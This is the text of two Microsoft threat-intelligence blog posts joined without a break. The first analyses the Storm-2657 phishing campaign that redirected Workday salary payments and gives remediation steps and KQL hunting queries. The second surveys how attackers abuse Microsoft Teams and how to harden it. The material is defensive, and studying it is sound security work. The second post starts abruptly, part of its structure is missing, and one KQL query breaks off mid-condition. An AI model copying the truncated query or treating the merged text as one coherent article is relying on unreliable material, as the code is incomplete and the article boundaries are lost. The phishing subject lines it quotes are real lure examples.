Microsoft Threat Intelligence has observed a financially motivated threat actor that we track as Storm-2657 compromising employee accounts to gain unauthorized access to employee profiles and divert salary payments to attacker-controlled accounts. These types of attacks have been dubbed “payroll pirate” by the industry. Storm-2657 is actively targeting a range of US-based organizations, particularly employees in sectors like higher education, to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday.
In a campaign observed in the first half of 2025, we identified the actor specifically targeting Workday profiles. However, it’s important to note that any SaaS systems storing HR or payment and bank account information could be easily targeted with the same technique. These attacks don’t represent any vulnerability in the Workday platform or products, but rather financially motivated threat actors using sophisticated social engineering tactics and taking advantage of the complete lack of multifactor authentication (MFA) or lack of phishing-resistant MFA to compromise accounts. Workday has published guidance for their customers in their community, and we thank Workday for their partnership and support in helping to raise awareness on how to mitigate this threat.
Microsoft has identified and reached out to some of the affected customers to share tactics, techniques, and procedures (TTPs) and assist with mitigation efforts. In this blog, we present our analysis of Storm-2657’s recent campaign and the TTPs employed in attacks. We offer comprehensive guidance for investigation and remediation, including implementing phishing-resistant MFA to help block these attacks and protect user accounts. Additionally, we provide comprehensive detections and hunting queries to enable organizations to defend against this attack and disrupt threat actor activity.
Analysis of the campaign
In the observed campaign, the threat actor gained initial access through phishing emails crafted to steal MFA codes using adversary-in-the-middle (AITM) phishing links. After obtaining MFA codes, the threat actor was able to gain unauthorized access to the victims’ Exchange Online and later hijacked and modified their Workday profiles.
After gaining access to compromised employee accounts, the threat actor created inbox rules to delete incoming warning notification emails from Workday, hiding the actor’s changes to the HR profiles. Storm-2657 then stealthily moved on to modify the employee’s salary payment configuration in their HR profile, thereby redirecting future salary payments to accounts under the actor’s control, causing financial harm to their victims. While the following example illustrates the attack flow as observed in Workday environments, it’s important to note that similar techniques could be leveraged against any payroll provider or SaaS platform.
Figure 1. Attack flow of threat actor activity in a real incident
Initial access
The threat actor used realistic phishing emails, targeting accounts at multiple universities, to harvest credentials. Since March 2025, we’ve observed 11 successfully compromised accounts at three universities that were used to send phishing emails to nearly 6,000 email accounts across 25 universities.
Some phishing emails contained Google Docs links, making detection challenging, as these are common in academic environments. In multiple instances, compromised accounts did not have MFA enabled. In other cases, users were tricked into disclosing MFA codes via AiTM phishing links distributed through email. Following the compromise of email accounts and the payroll modifications in Workday, the threat actor leveraged newly accessed accounts to distribute further phishing emails, both within the organization and externally to other universities.
The threat actor used several themes in their phishing emails. One common theme involved messages about illnesses or outbreaks on campus, suggesting that recipients might have been exposed. These emails included a link to a Google Docs page that then redirected to an attacker-controlled domain.
Some examples of the email subject lines are:
COVID-Like Case Reported — Check Your Contact Status
Confirmed Case of Communicable Illness
Confirmed Illness
In one instance, a phishing email was sent to 500 individuals within a single organization, encouraging targets to check their illness exposure status. Approximately 10% of recipients reported the email as a suspected phishing attempt.
Figure 2. Sample of a phishing email sent by the threat actor with illness exposure related theme
The second theme involved reports of misconduct or actions by individuals within the faculty, with the goal of tricking recipients into checking the link to determine if they are mentioned in the report.
The most recently identified theme involved phishing emails impersonating a legitimate university or an entity associated with a university. To make their messages appear convincing, Storm-2657 tailored the content based on the recipient’s institution. Examples included messages that appear to be official communications from the university president, information about compensation and benefits, or documents shared by HR with recipients. Most of the time the subject line contained either the university name or the university’s president name, further enhancing the email’s legitimacy and appeal to the intended target.
Some examples of the subject lines are:
Please find the document forwarded by the HR Department for your review
[UNIVERSITY NAME] 2025 Compensation and Benefits Update
A document authored by [UNIVERSITY PRESIDENT NAME] has been shared for your examination.
Figure 3. Sample of a phishing email sent by the threat actor with HR related theme
Defense evasion
Following account compromise, the threat actor created a generic inbox rule to hide or delete any incoming warning notification emails from the organization’s Workday email service. This rule ensured that the victim would not see the notification emails from Workday about the payroll changes made by the threat actor, thereby minimizing the likelihood of detection by the victim. In some cases, the threat actor might have attempted to stay under the radar and hide their traces from potential reviews by creating rule names solely using special characters or non-alphabetic symbols like “….” or “\’\’\’\’”.
Figure 4. An example of inbox rule creation to delete all incoming emails from Workday portal captured through Microsoft Defender for Cloud Apps
Persistence
In observed cases, the threat actor established persistence by enrolling their own phone numbers as MFA devices for victim accounts, either through Workday profiles or Duo MFA settings. By doing so, they bypassed the need for further MFA approval from the legitimate user, enabling continued access without detection.
Impact
The threat actor subsequently accessed Workday through single sign-on (SSO) and changed the victim’s payroll/bank account information.
With the Workday connector enabled in Microsoft Defender for Cloud Apps, analysts can efficiently investigate and identify attack traces by examining Workday logs and Defender-recorded actions. There are multiple indicators available to help pinpoint these changes. For example, one indicator from the Workday logs generated by such threat actor changes is an event called “Change My Account” or “Manage Payment Elections”, depending on the type of modifications performed in the Workday application audit logs:
Figure 5. Example of payment modification audit log as captured through Microsoft Defender for Cloud Apps
These payroll modifications are frequently accompanied by notification emails informing users that payroll or bank details have been changed or updated. As previously discussed, threat actors might attempt to eliminate these messages either through manual deletion or by establishing inbox rules. These deletions can be identified by monitoring Exchange Online events such as SoftDelete, HardDelete, and MoveToDeletedItems. The subjects of these emails typically contain the following terms:
“Payment Elections”
“Payment Election”
“Direct Deposit”
Microsoft Defender for Cloud Apps correlates signals from both Microsoft Exchange Online (first-party SaaS application) and Workday (third-party SaaS application), enabling thorough detection of suspicious activities that span multiple systems, as seen in the image below. Only by correlating first party and third-party signals is it possible to detect this activity spawning across multiple systems.
Figure 6. Example of audit logs captured through Microsoft Defender for Cloud Apps showcasing an inbox rule creation in Microsoft Exchange Online followed by payroll account modification in Workday
Mitigation and protection guidance
Mitigating threats from actors like Storm-2657 begins with securing user identity by eliminating traditional credentials and adopting passwordless, phishing-resistant MFA methods such as FIDO2 security keys, Windows Hello for Business, and Microsoft Authenticator passkeys.
If Microsoft Defender alerts indicate suspicious activity or confirmed compromised account or a system, it’s essential to act quickly and thoroughly. Below are recommended remediation steps for each affected identity:
Reset credentials – Immediately reset the account’s password and revoke any active sessions or tokens. This ensures that any stolen credentials can no longer be used.
Re-register or remove MFA devices – Review users MFA devices, specifically those recently added or updated.
Revert unauthorized payroll or financial changes – If the attacker modified payroll or financial configurations, such as direct deposit details, revert them to their original state and notify the appropriate internal teams.
Remove malicious inbox rules – Attackers often create inbox rules to hide their activity or forward sensitive data. Review and delete any suspicious or unauthorized rules.
Verify MFA reconfiguration – Confirm that the user has successfully reconfigured MFA and that the new setup uses secure, phishing-resistant methods.
Microsoft Defender XDR detections
Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
Threat actor gains access to account through phishing
Microsoft Defender for Office 365 – Email messages removed after delivery – Email reported by user as malware or phish
Microsoft Defender XDR – Compromised user account in a recognized attack pattern – Anonymous IP address
Defense Evasion
Threat actor creates an inbox rule to delete incoming emails from Workday
Microsoft Defender for Cloud apps – Possible BEC-related inbox rule – Suspicious inbox manipulation rule – Suspicious Workday inbox rule creation followed by a Workday session – Malicious inbox rule manipulation possibly related to BEC payroll fraud attempt
Impact
Threat actor gains access to victim’s Workday profile and modifies payroll elections
Microsoft Defender for Cloud apps – Suspicious payroll configuration user activity in Workday
Hunting queries
Microsoft Defender XDR
The Microsoft Defender for Cloud Apps connector for Workday includes write events such as Workday account updates, payroll configuration changes, etc. These are available in the Defender XDR CloudAppEvents hunting tables for further investigation. Important events related to this attack include but are not limited:
Review inbox rules created to hide or delete incoming emails from Workday
Results of the following query may indicate an attacker is trying to delete evidence of Workday activity.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Microsoft Exchange Online" and ActionType in ("New-InboxRule", "Set-InboxRule")
| extend Parameters = RawEventData.Parameters // extract inbox rule parameters
| where Parameters has "From" and Parameters has "@myworkday.com" // filter for inbox rule with From field and @MyWorkday.com in the parameters
| where Parameters has "DeleteMessage" or Parameters has ("MoveToFolder") // email deletion or move to folder (hiding)
| mv-apply Parameters on (where Parameters.Name == "From"
| extend RuleFrom = tostring(Parameters.Value))
| mv-apply Parameters on (where Parameters.Name == "Name"
| extend RuleName = tostring(Parameters.Value))
Review updates to payment election or bank account information in Workday
The following query surfaces changes to payment accounts in Workday.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Workday"
| where ActionType == "Change My Account" or ActionType == "Manage Payment Elections"
| extend Descriptor = tostring(RawEventData.target.descriptor)
Review device additions in Workday
The following query looks for recent device additions in Workday. If the device is unknown, it may indicate an attacker joined their own device for persistence and MFA evasion.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Workday"
| where ActionType has "Add iOS Device" or ActionType has "Add Android Device"
| extend Descriptor = tostring(RawEventData.target.descriptor) // will contain information of the device
Hunt for bulk suspicious emails from .edu sender
The following query identifies email from .edu senders sent to a high number of users.
EmailEvents
| where Timestamp >= ago(7d)
| where SenderFromDomain has "edu" or SenderMailFromDomain has "edu"
| where EmailDirection == "Inbound"
| summarize dcount(RecipientEmailAddress), dcount(InternetMessageId), make_set(InternetMessageId), dcount(Subject), dcount(NetworkMessageId), take_any(NetworkMessageId) by bin(Timestamp,1d), SenderFromAddress
| where dcount_RecipientEmailAddress > 100 // number can be adjusted, usually the sender will send emails to around 100-600 recipients per day
Hunt for phishing URL from identified .edu phish sender
If a suspicious .edu sender has been identified, use the following query to surface email events from this sender address.
EmailEvents
| where Timestamp >= ago(1d)
| where SenderFromAddress == ""
| where EmailDirection == "Inbound"
| project NetworkMessageId, Subject, InternetMessageId
| join EmailUrlInfo on NetworkMessageId
| where Timestamp >= ago(1d)
| project Url, NetworkMessageId, Subject, InternetMessageId
Hunt for user clicks to suspicious URL from the identified .edu phish sender (previous query)
If a suspicious .edu sender has been identified, use the below query to surface user clicks that may indicate a malicious link was accessed.
EmailEvents
| where Timestamp >= ago(1d)
| where SenderFromAddress == ""
| where EmailDirection == "Inbound"
| project NetworkMessageId, Subject, InternetMessageId
| join UrlClickEvents on NetworkMessageId
| where Timestamp >= ago(1d)
| project AccountUpn, Subject, InternetMessageId, DetectionMethods, ThreatTypes, IsClickedThrough // these users very likely fall into the phishing attack
Microsoft Sentinel
Install the Workday connector for Microsoft Sentinel. Microsoft Sentinel has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog.
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Malicious inbox rule
The query includes filters specific to inbox rule creation, operations for messages with ‘DeleteMessage’, and suspicious keywords.
let Keywords = dynamic(["helpdesk", " alert", " suspicious", "fake", "malicious", "phishing", "spam", "do not click", "do not open", "hijacked", "Fatal"]);
OfficeActivity
| where OfficeWorkload =~ "Exchange"
| where Operation =~ "New-InboxRule" and (ResultStatus =~ "True" or ResultStatus =~ "Succeeded")
| where Parameters has "Deleted Items" or Parameters has "Junk Email" or Parameters has "DeleteMessage"
| extend Events=todynamic(Parameters)
| parse Events with * "SubjectContainsWords" SubjectContainsWords '}'*
| parse Events with * "BodyContainsWords" BodyContainsWords '}'*
| parse Events with * "SubjectOrBodyContainsWords" SubjectOrBodyContainsWords '}'*
| where SubjectContainsWords has_any (Keywords)
or BodyContainsWords has_any (Keywords)
or SubjectOrBodyContainsWords has_any (Keywords)
| extend ClientIPAddress = case( ClientIP has ".", tostring(split(ClientIP,":")[0]), ClientIP has "[", tostring(trim_start(@'[[]',tostring(split(ClientIP,"]")[0]))), ClientIP )
| extend Keyword = iff(isnotempty(SubjectContainsWords), SubjectContainsWords, (iff(isnotempty(BodyContainsWords),BodyContainsWords,SubjectOrBodyContainsWords )))
| extend RuleDetail = case(OfficeObjectId contains '/' , tostring(split(OfficeObjectId, '/')[-1]) , tostring(split(OfficeObjectId, '\\')[-1]))
| summarize count(), StartTimeUtc = min(TimeGenerated), EndTimeUtc = max(TimeGenerated) by Operation, UserId, ClientIPAddress, ResultStatus, Keyword, OriginatingServer, OfficeObjectId, RuleDetail
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend OriginatingServerName = tostring(split(OriginatingServer, " ")[0])
Risky sign-in with new MFA method
This query identifies scenarios of risky sign-ins tied to new MFA methods being added.
let mfaMethodAdded=CloudAppEvents
| where ActionType =~ "Update user."
| where RawEventData has "StrongAuthenticationPhoneAppDetail"
| where isnotempty(RawEventData.ObjectId) and isnotempty(RawEventData.Target[1].ID)
| extend AccountUpn = tostring(RawEventData.ObjectId)
| extend AccountObjectId = tostring(RawEventData.Target[1].ID)
| project MfaAddedTimestamp=Timestamp,AccountUpn,AccountObjectId;
let usersWithNewMFAMethod=mfaMethodAdded
| distinct AccountObjectId;
let hasusersWithNewMFAMethod = isnotempty(toscalar(usersWithNewMFAMethod));
let riskySignins=AADSignInEventsBeta
| where hasusersWithNewMFAMethod
| where AccountObjectId in (usersWithNewMFAMethod)
| where RiskLevelDuringSignIn in ("50","100") //Medium and High sign-in risk level.
| where Application in ("Office 365 Exchange Online", "OfficeHome")
| where isnotempty(SessionId)
| project SignInTimestamp=Timestamp, Application, SessionId, AccountObjectId, IPAddress,RiskLevelDuringSignIn
| summarize SignInTimestamp=argmin(SignInTimestamp,*) by Application,SessionId, AccountObjectId, IPAddress,RiskLevelDuringSignIn;
mfaMethodAdded
| join riskySignins on AccountObjectId
| where MfaAddedTimestamp - SignInTimestamp
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Acknowledgments
We would like to thank Workday for their collaboration and assistance in responding to this threat.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Threat actors abuse its core capabilities – messaging (chat), calls and meetings, and video-based screen-sharing – at different points along the attack chain. This raises the stakes for defenders to proactively monitor, detect, and respond.
While under Microsoft’s Secure Future Initiative (SFI), default security has been strengthened by design, defenders still need to make the most out of customer-facing security capabilities. Therefore, this blog recommends countermeasures and controls across identity, endpoints, data apps, and network layers to help harden enterprise Teams environments. To frame these defenses, we first examine relevant stages of the attack chain. This guidance complements, but doesn’t repeat, the guidance built into the Microsoft Security Development Lifecycle (SDL) as outlined in the Teams Security Guide; we will instead focus on guidance for disrupting adversarial objectives based on the relatively recently observed attempts to exploit Teams infrastructure and capabilities.
Attack chain
Figure 1. Attack techniques that abuse Teams along the attack chain
Reconnaissance
Every Teams user account is backed by a Microsoft Entra ID identity. Each team member is an Entra ID object, and a team is a collection of channel objects. Teams may be configured for the cloud or a hybrid environment and supports multi-tenant organizations (MTO) and cross-tenant communication and collaboration. There are anonymous participants, guests, and external access users. From an API perspective, Teams is an object type that can be queried and stored in a local database for reconnaissance by enumerating directory objects, and mapping relationships and privileges. For example, federation tenant configuration indicates whether the tenant allows external communication and can be inferred from the API response queries reflecting the effective tenant federation policy.
While not unique to Teams, there are open-source frameworks that can specifically be leveraged to enumerate less secure users, groups, and tenants in Teams (mostly by repurposing the Microsoft Graph API or gathering DNS), including ROADtools, TeamFiltration, TeamsEnum, and MSFT-Recon-RS. These tools facilitate enumerating teams, members of teams and channels, tenant IDs and enabled domains, as well as permissiveness for communicating with external organizations and other properties, like presence. Presence indicates a user’s current availability and status outside the organization if Privacy mode is not enabled, which could then be exploited if the admin has not disabled external meetings and chat with people and organizations outside the organization (or at least limited it to specified external domains).
Many open-source tools are modular Python packages including reusable libraries and classes that can be directly imported or extended to support custom classes, meaning they are also interoperable with other custom open-source reconnaissance and discovery frameworks designed to identify potential misconfigurations.
Resource development
Microsoft continuously enhances protections against fraudulent Microsoft Entra ID Workforce tenants and the abuse of free tenants and trial subscriptions. As these defenses grow stronger, threat actors are forced to invest significantly more resources in their attempts to impersonate trusted users, demonstrating the effectiveness of our layered security approach. . This includes threat actors trying to compromise weakly configured legitimate tenants, or even actually purchasing legitimate ones if they have confidence they could ultimately profit. It should come as no surprise that if they can build a persona for social engineering, they will take advantage of the same resources as legitimate organizations, including custom domains and branding, especially if it can lend credibility to impersonating internal help desk, admin, or IT support, which could then be used as a convincing pretext to compromise targets through chat messaging and phone calls. Sophisticated threat actors try to use the very same resources used by trustworthy organizations, such as acquiring multiple tenants for staging development or running separate operations across regions, and using everyday Teams features like scheduling private meetings through chat, and audio, video and screen-sharing capabilities for productivity.
Initial access
Tech support scams remain a generally popular pretext for delivery of malicious remote monitoring and management (RMM) tools and information-stealing malware, leading to credential theft, extortion, and ransomware. There are always new variants to bypass security awareness defenses, such as the rise in email bombing to create a sense of stress and urgency to restore normalcy. In 2024, for instance, Storm-1811 impersonated tech support, claiming to be addressing junk email issues that it had initiated. They used RMM tools to deliver the ReedBed malware loader of ransomware payloads and remote command execution. Meanwhile, Midnight Blizard has successfully impersonated security and technical support teams to get targets to verify their identities under the pretext of protecting their accounts by entering authentication codes that complete the authentication flow for breaking into the accounts.
Similarly in May, Sophos identified a 3AM ransomware (believed to be a rebranding of BlackSuit) affiliate adopting techniques from Storm-1811, including flooding employees with unwanted emails followed by voice and video calls on Teams impersonating help desk personnel, claiming they needed remote access to stop the flood of junk emails. The threat actor reportedly spoofed the IT organization’s phone number.
With threat actors leveraging deepfakes, perceived authority helps make this kind of social engineering even more effective. Threat actors seeking to spoof automated workflow notifications and interactions can naturally extend to spoofing legitimate bots and agents as they gain more traction, as threat actors are turning to language models to facilitate their objectives.
Prevalent threat actors associated with ransomware campaigns, including the access broker tracked as Storm-1674 have used sophisticated red teaming tools, like TeamsPhisher, to distribute DarkGate malware and other malicious payloads over Teams. In December 2024, for example, Trend Micro reported an incident in which a threat actor impersonated a client during a Teams call to persuade a target to install AnyDesk. Remote access was reportedly then used also to deploy DarkGate. Threat actors may also just use Teams to gain initial access through drive-by-compromise activity to direct users to malicious websites.
Widely available admin tools, including AADInternals, could be leveraged to deliver malicious links and payloads directly into Teams. Teams branding (like any communications brand asset) makes for effective bait, and has been used by adversary-in-the-middle (AiTM) actors like Storm-00485. Threat actors could place malicious advertisements in search results for a spoofed app like Teams to misdirect users to a download site hosting credential-stealing malware. In July 2025, for instance, Malwarebytes reported observing a malvertising campaign delivering credential-stealing malware through a fake Microsoft Teams for Mac installer.
Whether it is a core app that is part of Teams, an app created by Microsoft, a partner app validated by Microsoft, or a custom app created by your own organization—no matter how secure an app—they could still be spoofed to gain a foothold in a network. And similar to leveraging a trusted brand like Teams, threat actors will also continue to try and take advantage of trusted relationships as well to gain Teams access, whether leveraging an account with access or abusing delegated administrator relationships to reach a target environment.
Persistence
Threat actors employ a variety of persistence techniques to maintain access to target systems—even after defenders attempt to regain control. These methods include abusing shortcuts in the Startup folder to execute malicious tools, or exploiting accessibility features like Sticky Keys (as seen in this ransomware case study). Threat actors could try to create guest users in target tenants or add their own credentials to a Teams account to maintain access.
Part of the reason device code phishing has been used to access target accounts is that it could enable persistent access for as long as the tokens remain valid. In February, Microsoft reported that Storm-2372 had been capturing authentication tokens by exploiting device code authentication flows, partially by masquerading as Microsoft Teams meeting invitations and initiating Teams chats to build rapport, so that when the targets were prompted to authenticate, they would use Storm-2372-generated device codes, enabling Storm-2372 to steal the authenticated sessions from the valid access tokens.
Teams phishing lures themselves can sometimes be a disguised attempt to help threat actors maintain persistence. For example, in July 2025, the financially motivated Storm-0324 most likely relied on TeamsPhisher to send Teams phishing lures to deliver a custom malware JSSloader for the ransomware operator Sangria Tempest to use as an access vector to maintain a foothold.
Execution
Apart from admin accounts, which are an attractive target because they come with elevated privileges, threat actors try and trick everyday Teams users into clicking links or opening files that lead to malicious code execution, just like through email.
Privilege escalation
If threat actors successfully compromise accounts or register actor-controlled devices, they often times try to change permission groups to escalate privileges.If a threat actor successfully compromises a Teams admin role, this could lead to abuse of the permissions to use the admin tools that belong to that role.
Credential access
With a valid refresh token, actors can impersonate users through Teams APIs. There is no shortage of administrator tools that can be maliciously repurposed, such as AADInternals, to intercept access to tokens with custom phishing flows. Tools like TeamFiltration could be leveraged just like for any other Microsoft 365 service for targeting Teams. If credentials are compromised through password spraying, threat actors use tools like this to request OAuth tokens for Teams and other services. Threat actors continue to try and bypass multifactor authentication (MFA) by repeatedly generating authentication prompts until someone accepts by mistake, and try to compromise MFA by adding alternate phone numbers or intercepting SMS-based codes.
For instance, the financially motivated threat actor Octo Tempest uses aggressive social engineering, including over Teams, to take control of MFA for privileged accounts. They consistently socially engineer help desk personnel, targeting federated identity providers using tools like AADInternals to federate existing domains, or spoof legitimate domains by adding and then federating new domains to forge tokens.
Discovery
To refine targeting, threat actors analyze Teams configuration data from API responses, enumerate Teams apps if they obtain unauthorized access, and search for valuable files and directories by leveraging toolkits for contextualizing potential attack paths. For instance, Void Blizzard has used AzureHound to enumerate a compromised organization’s Microsoft Entra ID configuration and gather details on users, roles, groups, applications, and devices. In a small number of compromises, the threat actor accessed Teams conversations and messages through the web client. AADInternals can also be used to discover Teams group structures and permissions.
The state-sponsored actor Peach Sandstorm has delivered malicious ZIP files through Teams, then used AD Explorer to take snapshots of on-premises Active Directory database and related files.
Lateral movement
A threat actor that manages to obtain Teams admin access (whether directly or indirectly by purchasing an admin account through a rogue online marketplace) could potentially leverage external communication settings and enable trust relationships between organizations to move laterally. In late 2024, in a campaign dubbed VEILdriveby Hunters’ Team AXON, the financially motivated cybercriminal threat actors Sangria Tempest and Storm-1674 used previously compromised accounts to impersonate IT personnel and convince a user in another organization through Teams to accept a chat request and grant access through a remote connection.
Collection
Threat actors often target Teams to try and collect information from it that could help them to accomplish their objectives, such as to discover collaboration channels or high-privileged accounts. They could try to mine Teams for any information perceived as useful in furtherance of their objectives, including pivoting from a compromised account to data accessible to that user from OneDrive or SharePoint. AADInternals can be used to collect sensitive chat data and user profiles. Post-compromise, GraphRunner can leverage the Microsoft Graph API to search all chats and channels and export Teams conversations.
Command and control
Threat actors attempt to deliver malware through file attachments in Teams chats or channels. A cracked version of Brute Ratel C4 (BRc4) includes features to establish C2 channels with platforms like Microsoft Teams by using their communications protocols to send and receive commands and data.
Post-compromise, threat actors can use red teaming tool ConvoC2 to send commands through Microsoft Teams messages using the Adaptive Card framework to embed data in hidden span tags and then exfiltrate using webhooks. But threat actors can also use legitimate remote access tools to try and establish interactive C2 through Teams.
Exfiltration
Threat actors may use Teams messages or shared links to direct data exfiltration to cloud storage under their control. Tools like TeamFiltration include an exfiltration module that rely on a valid access token to then extract recent contacts and download chats and files through OneDrive or SharePoint.
Impact
Threat actors try to use Teams messages to support financial theft through extortion, social engineering, or technical means.
Octo Tempest has used communication apps, including Teams to send taunting and threatening messages to organizations, defenders, and incident response teams as part of extortion and ransomware payment pressure tactics. After gaining control of MFA through social engineering password resets, they sign in to Teams to identify sensitive information supporting their financially motivated operations.
Configure just-in-time access to privileged roles. Use Microsoft Entra Privileged Identity Management (PIM) (preview) to provide as-needed and just-in-time access to Microsoft 365 roles to reduce standing privileges and limit exposure.
Harden endpoint security
Use configuration analyzer to strengthen security posture. Identify and remediate security policies that are less secure than the Standard or Strict protection profiles in preset security policies.
Keep Teams clients, browsers, OS, and dependencies updated.
Enable cloud-delivered protection in Defender Antivirus. Cloud-delivered protection enables sharing detection status between Microsoft 365 and Defender for Endpoint. Real-time protection blocking, including on-access scanning, is not availablewhen Defender Antivirus is running only in passive mode. You can turn on endpoint detection and response (EDR) in block mode even if Defender Antivirus isn’t your primary antivirus solution. EDR in block mode detects and remediates malicious items on the device post-breach.
Protect security settings from being disabled or changed with tamper protection.
If your organization utilizes another remote support tool such as Remote Help, disable or remove Quick Assist as a best practice, if it isn’t used within your environment.
Understand and use attack surface reduction capabilities in your environment to prevent common techniques used in combination with Teams threat activity as part of your first line of defense.
Manage call settings in Teams. Inbound calls originating from the Public Switched Telephone Network (PSTN) on a tenant global level can be blocked.
Use meeting and event policies to control the features that are available to organizers and participants.
Use the Teams admin center or PowerShell to require anonymous users and people from untrusted organizations to complete a verification check before joining the meeting.
Manage who can present and request control to generally prevent external users by default without business justification from being able to automatically request control over a shared window or screen.
Specify which types of external meetings and chat to allow and which users should have access to these features. You can change the default setting to limit external access to only allowed domains or block specific domains and subdomains. By blocking external communication with trial-only tenants, users that do not have any purchased seats are not able to search and contact your users via chat, Teams calls, and meetings.
You can prevent users that are not managed by an organization from starting conversations or prevent chat with them. If you choose to allow anonymous users in your environment, you can verify their identities by email code to join meetings (Premium).
Monitor Teams activities using activity policies in Defender for Cloud Apps. If external users are enabled, you can monitor their presence. Defender for Cloud Apps integrates directly with Microsoft 365 audit logs. Office 365 Cloud Apps Security has access to the features of Defender for Cloud Apps to support the Office 365 app connector.
Specify which users and groups can use Microsoft Teams apps or a copilot agent and control it on a per-app basis. You can change the default setting letting users install apps by default. Evaluate the compliance, security, and data handling information of an app and also understand the permissions requested by the app before you allow an app to be used.
Teams data is encrypted in transit and at rest in Microsoft services, between services, and between clients and services. For heightened confidentiality, you can also use end-to-end encryption in advanced meeting protection that is available with the Teams Premium add-on license. This encrypts audio, video, and video-based screen sharing at its origin and decrypts it at its destination.
Get started using attack simulation training. The Teams attack simulation training is currently in private preview. Build organizational resilience by raising awareness of QR code phishing, deepfakes including voice, and about protecting your organization from tech support and ClickFix scams.
Train developers to follow best practices when working with the Microsoft Graph API. Apply these practices when detecting, defending against, and responding to malicious techniques targeting Teams.
Learn more about some of the frequent initial access threats impacting SharePoint servers. SharePoint is a front end for Microsoft Teams and an attractive target.
Configure detection and response
Verify the auditing status of your organization in Microsoft Purview to make sure you can investigate incidents. In Threat Explorer, Content malware includes files detected by Safe Attachments for Teams, and URL clicks include all user clicks in Teams.
If user reporting of messages is turned on in the Teams admin center, it also needs to be turned on in the Defender portal. We encourage you to submit user reported Teams messages to Microsoft here.
Refer to the table listing the Microsoft Teams activities logged in the Microsoft 365 audit log. With the Office 365 Management Activity API, you can retrieve information about user, admin, system, and policy actions and events including from Entra activity logs.
Familiarize yourself with relevant advanced hunting schema and available tables.
Advanced hunting supports guided and advanced modes. You can use the advanced hunting queries in the advanced hunting section to hunt with these tables for Teams-related threats.
Several tables covering Teams-related threats are available in preview and populated by Defender for Office 365, including MessageEvents, MessagePostDeliveryEvents, MessageUrlInfo, and UrlClickEvents. These tables provide visibility into ZAP events and URLs in Teams messages, including allowed or blocked URL clicks in Teams clients. You can join these tables with others to gain more comprehensive insight into the progression of the attack chain and end-to-end threat activity.
Connect Microsoft 365 to Microsoft Defender for Cloud Apps.
To hunt for Teams messages without URLs, use the CloudAppEvents table, populated by Defender for Cloud Apps. This table also includes chat monitoring events, meeting and Teams call tracking, and behavioral analytics. To make sure advanced hunting tables are populated by Defender for Cloud Apps data, go to the Defender portal and select Settings > Cloud apps > App connectors. Then, in the Select Microsoft 365 components page, select the Microsoft 365 activities checkbox. Control Microsoft 365 with built-in policies and policy templates to detect and notify you about potential threats.
Many of the detection types enabled by default apply to Teams and do not require custom policy creation, including sign-ins from geographically distant locations in a short time, access from a country not previously associated with a user, unexpected admin actions, mass downloads, activity from anonymous IP addresses, or from a device flagged as malware-infected by Defender for Endpoint, as well as Oauth app abuse (when app governance is turned on).
Defender for Cloud Apps enables you to identify high-risk use and cloud security issues, detect abnormal user behavior, and prevent threats in your sanctioned cloud apps. You can integrate Defender for Cloud Apps with Microsoft Sentinel (preview) or use the supported APIs.
Refer to the compromised and malicious applications incident response playbook. This playbook includes relevant guidance for identifying and investigating malicious activity on third-party apps installed in Teams, custom apps using the Graph API for Teams, or OAuth abuse involving Teams permissions.
Discover and enable the Microsoft Sentinel data lake in Defender XDR. Sentinel data lake brings together security logs from data sources like Microsoft Defender and Microsoft Sentinel, Microsoft 365, Microsoft Entra ID, Purview, Intune, Microsoft Resource Graph, firewall and network logs, identity and access logs, DNS, plus sources from hundreds of connectors and solutions, including Microsoft Defender Threat Intelligence. Advanced hunting KQL queries can be run directly on the data lake. You can analyze the data using Jupyter notebooks.
Microsoft Defender detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
The following alerts might indicate threat activity associated with this threat.
Malicious sign in from a risky IP address
Malicious sign in from an unusual user agent
Account compromised following a password-spray attack
Compromised user account identified in Password Spray activity
Successful authentication after password spray attack
Password Spray detected via suspicious Teams client (TeamFiltration)
Microsoft Entra ID Protection
Any type of sign-in and user risk detection might also indicate threat activity associated with this threat. An example is listed below. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel
Anomalous Microsoft Teams login from web client
Microsoft Defender for Endpoint
The following alerts might indicate threat activity associated with this threat.
Suspicious module loaded using Microsoft Teams
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Suspicious usage of remote management software
Microsoft Defender for Office 365
The following alerts might indicate threat activity associated with this threat.
Malicious link shared in Teams chat
User clicked a malicious link in Teams chat
When Microsoft Defender for Cloud Apps is enabled, the following alert might indicate threat activity associated with this threat.
Potentially Malicious IT Support Teams impersonation post mail bombing
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
A potentially malicious URL click was detected
